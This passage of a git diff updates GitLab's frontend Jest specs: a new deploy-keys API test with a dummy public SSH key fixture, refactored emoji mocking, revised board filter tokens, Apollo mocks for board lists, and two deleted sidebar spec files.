+1,5 @@ import MockAdapter from 'axios-mock-adapter'; -import Api from '~/api'; +import Api, { DEFAULT_PER_PAGE } from '~/api'; import axios from '~/lib/utils/axios_utils'; import httpStatus from '~/lib/utils/http_status'; @@ -1574,6 +1574,51 @@ describe('Api', () => { }); }); + describe('deployKeys', () => { + it('fetches deploy keys', async () => { + const deployKeys = [ + { + id: 7, + title: 'My title 1', + created_at: '2021-10-29T16:59:55.229Z', + expires_at: null, + key: + 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDLvQzRX960N7dxPdge9o5a96+M4GEGQ7rxT2D3wAQDtQFjQV5ZcKb5wfeLtYLe3kRVI4lCO10PXeQppb1XBaYmVO31IaRkcgmMEPVyfp76Dp4CJZz6aMEbbcqfaHkDre0Fa8kzTXnBJVh2NeDbBfGMjFM5NRQLhKykodNsepO6dQ== dummy@gitlab.com', + fingerprint: '81:93:63:b9:1e:24:a2:aa:e0:87:d3:3f:42:81:f2:c2', + projects_with_write_access: [ + { + id: 11, + description: null, + name: 'project1', + name_with_namespace: 'John Doe3 / project1', + path: 'project1', + path_with_namespace: 'namespace1/project1', + created_at: '2021-10-29T16:59:54.668Z', + }, + { + id: 12, + description: null, + name: 'project2', + name_with_namespace: 'John Doe4 / project2', + path: 'project2', + path_with_namespace: 'namespace2/project2', + created_at: '2021-10-29T16:59:55.116Z', + }, + ], + }, + ]; + + const expectedUrl = `${dummyUrlRoot}/api/${dummyApiVersion}/deploy_keys`; + mock.onGet(expectedUrl).reply(httpStatus.OK, deployKeys); + + const params = { page: 2, public: true }; + const { data } = await Api.deployKeys(params); + + expect(data).toEqual(deployKeys); + expect(mock.history.get[0].params).toEqual({ ...params, per_page: DEFAULT_PER_PAGE }); + }); + }); + describe('Feature Flag User List', () => { let expectedUrl; let projectId; diff --git a/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js b/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js index b0d1b70c198..bfa8274f0eb 100644 --- 
a/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js +++ b/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js @@ -13,6 +13,7 @@ localVue.use(VueApollo); const keepLatestArtifactProjectMock = { data: { project: { + id: '1', ciCdSettings: { keepLatestArtifact: true }, }, }, diff --git a/spec/frontend/awards_handler_spec.js b/spec/frontend/awards_handler_spec.js index 09270174674..c4002ec11f3 100644 --- a/spec/frontend/awards_handler_spec.js +++ b/spec/frontend/awards_handler_spec.js @@ -1,15 +1,12 @@ -import MockAdapter from 'axios-mock-adapter'; import $ from 'jquery'; import Cookies from 'js-cookie'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import { useFakeRequestAnimationFrame } from 'helpers/fake_request_animation_frame'; import loadAwardsHandler from '~/awards_handler'; -import { EMOJI_VERSION } from '~/emoji'; -import axios from '~/lib/utils/axios_utils'; window.gl = window.gl || {}; window.gon = window.gon || {}; -let mock; let awardsHandler = null; const urlRoot = gon.relative_url_root; @@ -76,8 +73,7 @@ describe('AwardsHandler', () => { }; beforeEach(async () => { - mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, emojiData); + await initEmojiMock(emojiData); loadFixtures('snippets/show.html'); @@ -89,7 +85,7 @@ describe('AwardsHandler', () => { // restore original url root value gon.relative_url_root = urlRoot; - mock.restore(); + clearEmojiMock(); // Undo what we did to the shared <body> $('body').removeAttr('data-page'); diff --git a/spec/frontend/behaviors/gl_emoji_spec.js b/spec/frontend/behaviors/gl_emoji_spec.js index d23a0a84997..0f4e2e08dbd 100644 --- a/spec/frontend/behaviors/gl_emoji_spec.js +++ b/spec/frontend/behaviors/gl_emoji_spec.js @@ -1,15 +1,13 @@ -import MockAdapter from 'axios-mock-adapter'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import waitForPromises from 
'helpers/wait_for_promises'; import installGlEmojiElement from '~/behaviors/gl_emoji'; -import { initEmojiMap, EMOJI_VERSION } from '~/emoji'; +import { EMOJI_VERSION } from '~/emoji'; import * as EmojiUnicodeSupport from '~/emoji/support'; -import axios from '~/lib/utils/axios_utils'; jest.mock('~/emoji/support'); describe('gl_emoji', () => { - let mock; const emojiData = { grey_question: { c: 'symbols', @@ -38,15 +36,12 @@ describe('gl_emoji', () => { return div.firstElementChild; } - beforeEach(() => { - mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, emojiData); - - return initEmojiMap().catch(() => {}); + beforeEach(async () => { + await initEmojiMock(emojiData); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); document.body.innerHTML = ''; }); diff --git a/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap b/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap index dfa6b99080b..46a5631b028 100644 --- a/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap +++ b/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap @@ -34,6 +34,7 @@ exports[`Blob Header Filepath rendering matches the snapshot 1`] = ` text="foo/bar/dummy.md" title="Copy file path" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/blob/viewer/index_spec.js b/spec/frontend/blob/viewer/index_spec.js index 705c4630a68..061ac7ad167 100644 --- a/spec/frontend/blob/viewer/index_spec.js +++ b/spec/frontend/blob/viewer/index_spec.js @@ -28,7 +28,7 @@ describe('Blob viewer', () => { loadFixtures('blob/show_readme.html'); $('#modal-upload-blob').remove(); - mock.onGet(/blob\/master\/README\.md/).reply(200, { + mock.onGet(/blob\/.+\/README\.md/).reply(200, { html: '<div>testing</div>', }); diff --git a/spec/frontend/blob_edit/edit_blob_spec.js b/spec/frontend/blob_edit/edit_blob_spec.js index 
ebef0656750..9c974e79e6e 100644 --- a/spec/frontend/blob_edit/edit_blob_spec.js +++ b/spec/frontend/blob_edit/edit_blob_spec.js @@ -1,14 +1,29 @@ import waitForPromises from 'helpers/wait_for_promises'; import EditBlob from '~/blob_edit/edit_blob'; +import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import { FileTemplateExtension } from '~/editor/extensions/source_editor_file_template_ext'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; import SourceEditor from '~/editor/source_editor'; jest.mock('~/editor/source_editor'); -jest.mock('~/editor/extensions/source_editor_markdown_ext'); +jest.mock('~/editor/extensions/source_editor_extension_base'); jest.mock('~/editor/extensions/source_editor_file_template_ext'); +jest.mock('~/editor/extensions/source_editor_markdown_ext'); +jest.mock('~/editor/extensions/source_editor_markdown_livepreview_ext'); const PREVIEW_MARKDOWN_PATH = '/foo/bar/preview_markdown'; +const defaultExtensions = [ + { definition: SourceEditorExtension }, + { definition: FileTemplateExtension }, +]; +const markdownExtensions = [ + { definition: EditorMarkdownExtension }, + { + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath: PREVIEW_MARKDOWN_PATH }, + }, +]; describe('Blob Editing', () => { const useMock = jest.fn(); @@ -29,7 +44,9 @@ describe('Blob Editing', () => { jest.spyOn(SourceEditor.prototype, 'createInstance').mockReturnValue(mockInstance); }); afterEach(() => { + SourceEditorExtension.mockClear(); EditorMarkdownExtension.mockClear(); + EditorMarkdownPreviewExtension.mockClear(); FileTemplateExtension.mockClear(); }); @@ -45,26 +62,22 @@ describe('Blob Editing', () => { await waitForPromises(); }; - it('loads FileTemplateExtension by default', async () => { + it('loads SourceEditorExtension and FileTemplateExtension by 
default', async () => { await initEditor(); - expect(useMock).toHaveBeenCalledWith(expect.any(FileTemplateExtension)); - expect(FileTemplateExtension).toHaveBeenCalledTimes(1); + expect(useMock).toHaveBeenCalledWith(defaultExtensions); }); describe('Markdown', () => { - it('does not load MarkdownExtension by default', async () => { + it('does not load MarkdownExtensions by default', async () => { await initEditor(); expect(EditorMarkdownExtension).not.toHaveBeenCalled(); + expect(EditorMarkdownPreviewExtension).not.toHaveBeenCalled(); }); it('loads MarkdownExtension only for the markdown files', async () => { await initEditor(true); - expect(useMock).toHaveBeenCalledWith(expect.any(EditorMarkdownExtension)); - expect(EditorMarkdownExtension).toHaveBeenCalledTimes(1); - expect(EditorMarkdownExtension).toHaveBeenCalledWith({ - instance: mockInstance, - previewMarkdownPath: PREVIEW_MARKDOWN_PATH, - }); + expect(useMock).toHaveBeenCalledTimes(2); + expect(useMock.mock.calls[1]).toEqual([markdownExtensions]); }); }); diff --git a/spec/frontend/boards/board_list_helper.js b/spec/frontend/boards/board_list_helper.js index 811f0043a01..d0f14bd37c1 100644 --- a/spec/frontend/boards/board_list_helper.js +++ b/spec/frontend/boards/board_list_helper.js @@ -1,4 +1,5 @@ import { createLocalVue, shallowMount } from '@vue/test-utils'; +import VueApollo from 'vue-apollo'; import Vuex from 'vuex'; import BoardCard from '~/boards/components/board_card.vue'; @@ -6,7 +7,15 @@ import BoardList from '~/boards/components/board_list.vue'; import BoardNewIssue from '~/boards/components/board_new_issue.vue'; import BoardNewItem from '~/boards/components/board_new_item.vue'; import defaultState from '~/boards/stores/state'; -import { mockList, mockIssuesByListId, issues, mockGroupProjects } from './mock_data'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import listQuery from 'ee_else_ce/boards/graphql/board_lists_deferred.query.graphql'; +import { + mockList, + 
mockIssuesByListId, + issues, + mockGroupProjects, + boardListQueryResponse, +} from './mock_data'; export default function createComponent({ listIssueProps = {}, @@ -15,16 +24,23 @@ export default function createComponent({ actions = {}, getters = {}, provide = {}, + data = {}, state = defaultState, stubs = { BoardNewIssue, BoardNewItem, BoardCard, }, + issuesCount, } = {}) { const localVue = createLocalVue(); + localVue.use(VueApollo); localVue.use(Vuex); + const fakeApollo = createMockApollo([ + [listQuery, jest.fn().mockResolvedValue(boardListQueryResponse(issuesCount))], + ]); + const store = new Vuex.Store({ state: { selectedProject: mockGroupProjects[0], @@ -68,6 +84,7 @@ export default function createComponent({ } const component = shallowMount(BoardList, { + apolloProvider: fakeApollo, localVue, store, propsData: { @@ -87,6 +104,11 @@ export default function createComponent({ ...provide, }, stubs, + data() { + return { + ...data, + }; + }, }); return component; diff --git a/spec/frontend/boards/board_list_spec.js b/spec/frontend/boards/board_list_spec.js index 6f623eab1af..1981ed5ab7f 100644 --- a/spec/frontend/boards/board_list_spec.js +++ b/spec/frontend/boards/board_list_spec.js @@ -38,7 +38,7 @@ describe('Board list component', () => { describe('When Expanded', () => { beforeEach(() => { - wrapper = createComponent(); + wrapper = createComponent({ issuesCount: 1 }); }); it('renders component', () => { @@ -97,14 +97,6 @@ describe('Board list component', () => { await wrapper.vm.$nextTick(); expect(wrapper.find('.board-list-count').attributes('data-issue-id')).toBe('-1'); }); - - it('shows how many more issues to load', async () => { - wrapper.vm.showCount = true; - wrapper.setProps({ list: { issuesCount: 20 } }); - - await wrapper.vm.$nextTick(); - expect(wrapper.find('.board-list-count').text()).toBe('Showing 1 of 20 issues'); - }); }); describe('load more issues', () => { @@ -113,9 +105,7 @@ describe('Board list component', () => { }; beforeEach(() => 
{ - wrapper = createComponent({ - listProps: { issuesCount: 25 }, - }); + wrapper = createComponent(); }); it('does not load issues if already loading', () => { @@ -131,13 +121,27 @@ describe('Board list component', () => { it('shows loading more spinner', async () => { wrapper = createComponent({ state: { listsFlags: { 'gid://gitlab/List/1': { isLoadingMore: true } } }, + data: { + showCount: true, + }, }); - wrapper.vm.showCount = true; await wrapper.vm.$nextTick(); expect(findIssueCountLoadingIcon().exists()).toBe(true); }); + + it('shows how many more issues to load', async () => { + // wrapper.vm.showCount = true; + wrapper = createComponent({ + data: { + showCount: true, + }, + }); + + await wrapper.vm.$nextTick(); + expect(wrapper.find('.board-list-count').text()).toBe('Showing 1 of 20 issues'); + }); }); describe('max issue count warning', () => { diff --git a/spec/frontend/boards/components/board_content_sidebar_spec.js b/spec/frontend/boards/components/board_content_sidebar_spec.js index 8a8250205d0..7b176cea2a3 100644 --- a/spec/frontend/boards/components/board_content_sidebar_spec.js +++ b/spec/frontend/boards/components/board_content_sidebar_spec.js @@ -1,18 +1,20 @@ import { GlDrawer } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { MountingPortal } from 'portal-vue'; +import Vue from 'vue'; import Vuex from 'vuex'; import SidebarDropdownWidget from 'ee_else_ce/sidebar/components/sidebar_dropdown_widget.vue'; import { stubComponent } from 'helpers/stub_component'; import BoardContentSidebar from '~/boards/components/board_content_sidebar.vue'; -import BoardSidebarLabelsSelect from '~/boards/components/sidebar/board_sidebar_labels_select.vue'; import BoardSidebarTitle from '~/boards/components/sidebar/board_sidebar_title.vue'; import { ISSUABLE } from '~/boards/constants'; import SidebarDateWidget from '~/sidebar/components/date/sidebar_date_widget.vue'; import SidebarSubscriptionsWidget from 
'~/sidebar/components/subscriptions/sidebar_subscriptions_widget.vue'; import SidebarTodoWidget from '~/sidebar/components/todo_toggle/sidebar_todo_widget.vue'; +import SidebarLabelsWidget from '~/vue_shared/components/sidebar/labels_select_widget/labels_select_root.vue'; import { mockActiveIssue, mockIssue, mockIssueGroupPath, mockIssueProjectPath } from '../mock_data'; +Vue.use(Vuex); describe('BoardContentSidebar', () => { let wrapper; let store; @@ -32,6 +34,7 @@ describe('BoardContentSidebar', () => { groupPathForActiveIssue: () => mockIssueGroupPath, projectPathForActiveIssue: () => mockIssueProjectPath, isSidebarOpen: () => true, + isGroupBoard: () => false, ...mockGetters, }, actions: mockActions, @@ -115,8 +118,8 @@ describe('BoardContentSidebar', () => { expect(wrapper.findComponent(SidebarTodoWidget).exists()).toBe(true); }); - it('renders BoardSidebarLabelsSelect', () => { - expect(wrapper.findComponent(BoardSidebarLabelsSelect).exists()).toBe(true); + it('renders SidebarLabelsWidget', () => { + expect(wrapper.findComponent(SidebarLabelsWidget).exists()).toBe(true); }); it('renders BoardSidebarTitle', () => { diff --git a/spec/frontend/boards/components/board_filtered_search_spec.js b/spec/frontend/boards/components/board_filtered_search_spec.js index b858d6e95a0..ea551e94f2f 100644 --- a/spec/frontend/boards/components/board_filtered_search_spec.js +++ b/spec/frontend/boards/components/board_filtered_search_spec.js @@ -18,7 +18,7 @@ describe('BoardFilteredSearch', () => { { icon: 'labels', title: __('Label'), - type: 'label_name', + type: 'label', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -31,7 +31,7 @@ describe('BoardFilteredSearch', () => { { icon: 'pencil', title: __('Author'), - type: 'author_username', + type: 'author', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -97,7 +97,7 @@ describe('BoardFilteredSearch', () => { createComponent({ props: { 
eeFilters: { labelName: ['label'] } } }); expect(findFilteredSearch().props('initialFilterValue')).toEqual([ - { type: 'label_name', value: { data: 'label', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, ]); }); }); @@ -117,12 +117,14 @@ describe('BoardFilteredSearch', () => { it('sets the url params to the correct results', async () => { const mockFilters = [ - { type: 'author_username', value: { data: 'root', operator: '=' } }, - { type: 'label_name', value: { data: 'label', operator: '=' } }, - { type: 'label_name', value: { data: 'label2', operator: '=' } }, - { type: 'milestone_title', value: { data: 'New Milestone', operator: '=' } }, - { type: 'types', value: { data: 'INCIDENT', operator: '=' } }, + { type: 'author', value: { data: 'root', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, + { type: 'label', value: { data: 'label2', operator: '=' } }, + { type: 'milestone', value: { data: 'New Milestone', operator: '=' } }, + { type: 'type', value: { data: 'INCIDENT', operator: '=' } }, { type: 'weight', value: { data: '2', operator: '=' } }, + { type: 'iteration', value: { data: '3341', operator: '=' } }, + { type: 'release', value: { data: 'v1.0.0', operator: '=' } }, ]; jest.spyOn(urlUtility, 'updateHistory'); findFilteredSearch().vm.$emit('onFilter', mockFilters); @@ -131,7 +133,7 @@ describe('BoardFilteredSearch', () => { title: '', replace: true, url: - 'http://test.host/?author_username=root&label_name[]=label&label_name[]=label2&milestone_title=New+Milestone&types=INCIDENT&weight=2', + 'http://test.host/?author_username=root&label_name[]=label&label_name[]=label2&milestone_title=New+Milestone&iteration_id=3341&types=INCIDENT&weight=2&release_tag=v1.0.0', }); }); }); @@ -145,8 +147,8 @@ describe('BoardFilteredSearch', () => { it('passes the correct props to FilterSearchBar', () => { expect(findFilteredSearch().props('initialFilterValue')).toEqual([ - { type: 'author_username', value: { 
data: 'root', operator: '=' } }, - { type: 'label_name', value: { data: 'label', operator: '=' } }, + { type: 'author', value: { data: 'root', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, ]); }); }); diff --git a/spec/frontend/boards/components/board_list_header_spec.js b/spec/frontend/boards/components/board_list_header_spec.js index 0abb00e0fa5..148d0c5684d 100644 --- a/spec/frontend/boards/components/board_list_header_spec.js +++ b/spec/frontend/boards/components/board_list_header_spec.js @@ -1,18 +1,22 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; import Vuex from 'vuex'; +import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import { mockLabelList } from 'jest/boards/mock_data'; +import { boardListQueryResponse, mockLabelList } from 'jest/boards/mock_data'; import BoardListHeader from '~/boards/components/board_list_header.vue'; import { ListType } from '~/boards/constants'; +import listQuery from 'ee_else_ce/boards/graphql/board_lists_deferred.query.graphql'; -const localVue = createLocalVue(); - -localVue.use(Vuex); +Vue.use(VueApollo); +Vue.use(Vuex); describe('Board List Header Component', () => { let wrapper; let store; + let fakeApollo; const updateListSpy = jest.fn(); const toggleListCollapsedSpy = jest.fn(); @@ -20,6 +24,7 @@ describe('Board List Header Component', () => { afterEach(() => { wrapper.destroy(); wrapper = null; + fakeApollo = null; localStorage.clear(); }); @@ -29,6 +34,7 @@ describe('Board List Header Component', () => { collapsed = false, withLocalStorage = true, currentUserId = 1, + listQueryHandler = jest.fn().mockResolvedValue(boardListQueryResponse()), } = {}) => { const boardId = '1'; @@ -56,10 +62,12 @@ describe('Board List Header Component', () => { getters: { isEpicBoard: () => false }, }); + 
fakeApollo = createMockApollo([[listQuery, listQueryHandler]]); + wrapper = extendedWrapper( shallowMount(BoardListHeader, { + apolloProvider: fakeApollo, store, - localVue, propsData: { disabled: false, list: listMock, diff --git a/spec/frontend/boards/components/issue_board_filtered_search_spec.js b/spec/frontend/boards/components/issue_board_filtered_search_spec.js index 45c5c87d800..76e8b84d8ef 100644 --- a/spec/frontend/boards/components/issue_board_filtered_search_spec.js +++ b/spec/frontend/boards/components/issue_board_filtered_search_spec.js @@ -1,3 +1,4 @@ +import { orderBy } from 'lodash'; import { shallowMount } from '@vue/test-utils'; import BoardFilteredSearch from 'ee_else_ce/boards/components/board_filtered_search.vue'; import IssueBoardFilteredSpec from '~/boards/components/issue_board_filtered_search.vue'; @@ -16,6 +17,7 @@ describe('IssueBoardFilter', () => { propsData: { fullPath: 'gitlab-org', boardType: 'group' }, provide: { isSignedIn, + releasesFetchPath: '/releases', }, }); }; @@ -61,7 +63,7 @@ describe('IssueBoardFilter', () => { isSignedIn, ); - expect(findBoardsFilteredSearch().props('tokens')).toEqual(tokens); + expect(findBoardsFilteredSearch().props('tokens')).toEqual(orderBy(tokens, ['title'])); }, ); }); diff --git a/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js b/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js deleted file mode 100644 index fb9d823107e..00000000000 --- a/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js +++ /dev/null @@ -1,168 +0,0 @@ -import { GlLabel } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import { TEST_HOST } from 'helpers/test_constants'; -import { - labels as TEST_LABELS, - mockIssue as TEST_ISSUE, - mockIssueFullPath as TEST_ISSUE_FULLPATH, -} from 'jest/boards/mock_data'; -import BoardEditableItem from '~/boards/components/sidebar/board_editable_item.vue'; -import BoardSidebarLabelsSelect from 
'~/boards/components/sidebar/board_sidebar_labels_select.vue'; -import { createStore } from '~/boards/stores'; -import { getIdFromGraphQLId } from '~/graphql_shared/utils'; - -const TEST_LABELS_PAYLOAD = TEST_LABELS.map((label) => ({ ...label, set: true })); -const TEST_LABELS_TITLES = TEST_LABELS.map((label) => label.title); - -describe('~/boards/components/sidebar/board_sidebar_labels_select.vue', () => { - let wrapper; - let store; - - afterEach(() => { - wrapper.destroy(); - store = null; - wrapper = null; - }); - - const createWrapper = ({ labels = [], providedValues = {} } = {}) => { - store = createStore(); - store.state.boardItems = { [TEST_ISSUE.id]: { ...TEST_ISSUE, labels } }; - store.state.activeId = TEST_ISSUE.id; - - wrapper = shallowMount(BoardSidebarLabelsSelect, { - store, - provide: { - canUpdate: true, - labelsManagePath: TEST_HOST, - labelsFilterBasePath: TEST_HOST, - ...providedValues, - }, - stubs: { - BoardEditableItem, - LabelsSelect: true, - }, - }); - }; - - const findLabelsSelect = () => wrapper.find({ ref: 'labelsSelect' }); - const findLabelsTitles = () => - wrapper.findAll(GlLabel).wrappers.map((item) => item.props('title')); - const findCollapsed = () => wrapper.find('[data-testid="collapsed-content"]'); - - describe('when labelsFetchPath is provided', () => { - it('uses injected labels fetch path', () => { - createWrapper({ providedValues: { labelsFetchPath: 'foobar' } }); - - expect(findLabelsSelect().props('labelsFetchPath')).toEqual('foobar'); - }); - }); - - it('uses the default project label endpoint', () => { - createWrapper(); - - expect(findLabelsSelect().props('labelsFetchPath')).toEqual( - `/${TEST_ISSUE_FULLPATH}/-/labels?include_ancestor_groups=true`, - ); - }); - - it('renders "None" when no labels are selected', () => { - createWrapper(); - - expect(findCollapsed().text()).toBe('None'); - }); - - it('renders labels when set', () => { - createWrapper({ labels: TEST_LABELS }); - - 
expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - }); - - describe('when labels are submitted', () => { - beforeEach(async () => { - createWrapper(); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => TEST_LABELS); - findLabelsSelect().vm.$emit('updateSelectedLabels', TEST_LABELS_PAYLOAD); - store.state.boardItems[TEST_ISSUE.id].labels = TEST_LABELS; - await wrapper.vm.$nextTick(); - }); - - it('collapses sidebar and renders labels', () => { - expect(findCollapsed().isVisible()).toBe(true); - expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - }); - - it('commits change to the server', () => { - expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - addLabelIds: TEST_LABELS.map((label) => label.id), - projectPath: TEST_ISSUE_FULLPATH, - removeLabelIds: [], - iid: null, - }); - }); - }); - - describe('when labels are updated over existing labels', () => { - const testLabelsPayload = [ - { id: 5, set: true }, - { id: 6, set: false }, - { id: 7, set: true }, - ]; - const expectedLabels = [{ id: 5 }, { id: 7 }]; - - beforeEach(async () => { - createWrapper({ labels: TEST_LABELS }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => expectedLabels); - findLabelsSelect().vm.$emit('updateSelectedLabels', testLabelsPayload); - await wrapper.vm.$nextTick(); - }); - - it('commits change to the server', () => { - expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - addLabelIds: [5, 7], - removeLabelIds: [6], - projectPath: TEST_ISSUE_FULLPATH, - iid: null, - }); - }); - }); - - describe('when removing individual labels', () => { - const testLabel = TEST_LABELS[0]; - - beforeEach(async () => { - createWrapper({ labels: [testLabel] }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => {}); - }); - - it('commits change to the server', () => { - wrapper.find(GlLabel).vm.$emit('close', testLabel); - - 
expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - removeLabelIds: [getIdFromGraphQLId(testLabel.id)], - projectPath: TEST_ISSUE_FULLPATH, - }); - }); - }); - - describe('when the mutation fails', () => { - beforeEach(async () => { - createWrapper({ labels: TEST_LABELS }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => { - throw new Error(['failed mutation']); - }); - jest.spyOn(wrapper.vm, 'setError').mockImplementation(() => {}); - findLabelsSelect().vm.$emit('updateSelectedLabels', [{ id: '?' }]); - await wrapper.vm.$nextTick(); - }); - - it('collapses sidebar and renders former issue weight', () => { - expect(findCollapsed().isVisible()).toBe(true); - expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - expect(wrapper.vm.setError).toHaveBeenCalled(); - }); - }); -}); diff --git a/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js b/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js deleted file mode 100644 index 6e1b528babc..00000000000 --- a/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js +++ /dev/null @@ -1,163 +0,0 @@ -import { GlToggle, GlLoadingIcon } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import Vue from 'vue'; -import Vuex from 'vuex'; -import BoardSidebarSubscription from '~/boards/components/sidebar/board_sidebar_subscription.vue'; -import { createStore } from '~/boards/stores'; -import * as types from '~/boards/stores/mutation_types'; -import { mockActiveIssue } from '../../mock_data'; - -Vue.use(Vuex); - -describe('~/boards/components/sidebar/board_sidebar_subscription_spec.vue', () => { - let wrapper; - let store; - - const findNotificationHeader = () => wrapper.find("[data-testid='notification-header-text']"); - const findToggle = () => wrapper.findComponent(GlToggle); - const findGlLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); - - const createComponent = (activeBoardItem = { 
...mockActiveIssue }) => { - store = createStore(); - store.state.boardItems = { [activeBoardItem.id]: activeBoardItem }; - store.state.activeId = activeBoardItem.id; - - wrapper = mount(BoardSidebarSubscription, { - store, - provide: { - emailsDisabled: false, - }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - store = null; - jest.clearAllMocks(); - }); - - describe('Board sidebar subscription component template', () => { - it('displays "notifications" heading', () => { - createComponent(); - - expect(findNotificationHeader().text()).toBe('Notifications'); - }); - - it('renders toggle with label', () => { - createComponent(); - - expect(findToggle().props('label')).toBe(BoardSidebarSubscription.i18n.header.title); - }); - - it('renders toggle as "off" when currently not subscribed', () => { - createComponent(); - - expect(findToggle().exists()).toBe(true); - expect(findToggle().props('value')).toBe(false); - }); - - it('renders toggle as "on" when currently subscribed', () => { - createComponent({ - ...mockActiveIssue, - subscribed: true, - }); - - expect(findToggle().exists()).toBe(true); - expect(findToggle().props('value')).toBe(true); - }); - - describe('when notification emails have been disabled', () => { - beforeEach(() => { - createComponent({ - ...mockActiveIssue, - emailsDisabled: true, - }); - }); - - it('displays a message that notification have been disabled', () => { - expect(findNotificationHeader().text()).toBe( - 'Notifications have been disabled by the project or group owner', - ); - }); - - it('does not render the toggle button', () => { - expect(findToggle().exists()).toBe(false); - }); - }); - }); - - describe('Board sidebar subscription component `behavior`', () => { - const mockSetActiveIssueSubscribed = (subscribedState) => { - jest.spyOn(wrapper.vm, 'setActiveItemSubscribed').mockImplementation(async () => { - store.commit(types.UPDATE_BOARD_ITEM_BY_ID, { - itemId: mockActiveIssue.id, - prop: 'subscribed', - value: 
subscribedState, - }); - }); - }; - - it('subscribing to notification', async () => { - createComponent(); - mockSetActiveIssueSubscribed(true); - - expect(findGlLoadingIcon().exists()).toBe(false); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(true); - expect(wrapper.vm.setActiveItemSubscribed).toHaveBeenCalledWith({ - subscribed: true, - projectPath: 'gitlab-org/test-subgroup/gitlab-test', - }); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(false); - expect(findToggle().props('value')).toBe(true); - }); - - it('unsubscribing from notification', async () => { - createComponent({ - ...mockActiveIssue, - subscribed: true, - }); - mockSetActiveIssueSubscribed(false); - - expect(findGlLoadingIcon().exists()).toBe(false); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - - expect(wrapper.vm.setActiveItemSubscribed).toHaveBeenCalledWith({ - subscribed: false, - projectPath: 'gitlab-org/test-subgroup/gitlab-test', - }); - expect(findGlLoadingIcon().exists()).toBe(true); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(false); - expect(findToggle().props('value')).toBe(false); - }); - - it('flashes an error message when setting the subscribed state fails', async () => { - createComponent(); - jest.spyOn(wrapper.vm, 'setActiveItemSubscribed').mockImplementation(async () => { - throw new Error(); - }); - jest.spyOn(wrapper.vm, 'setError').mockImplementation(() => {}); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - expect(wrapper.vm.setError).toHaveBeenCalled(); - expect(wrapper.vm.setError.mock.calls[0][0].message).toBe( - wrapper.vm.$options.i18n.updateSubscribedErrorMessage, - ); - }); - }); -}); diff --git a/spec/frontend/boards/mock_data.js b/spec/frontend/boards/mock_data.js index 8fcad99f8a7..a081a60166b 100644 --- a/spec/frontend/boards/mock_data.js +++ 
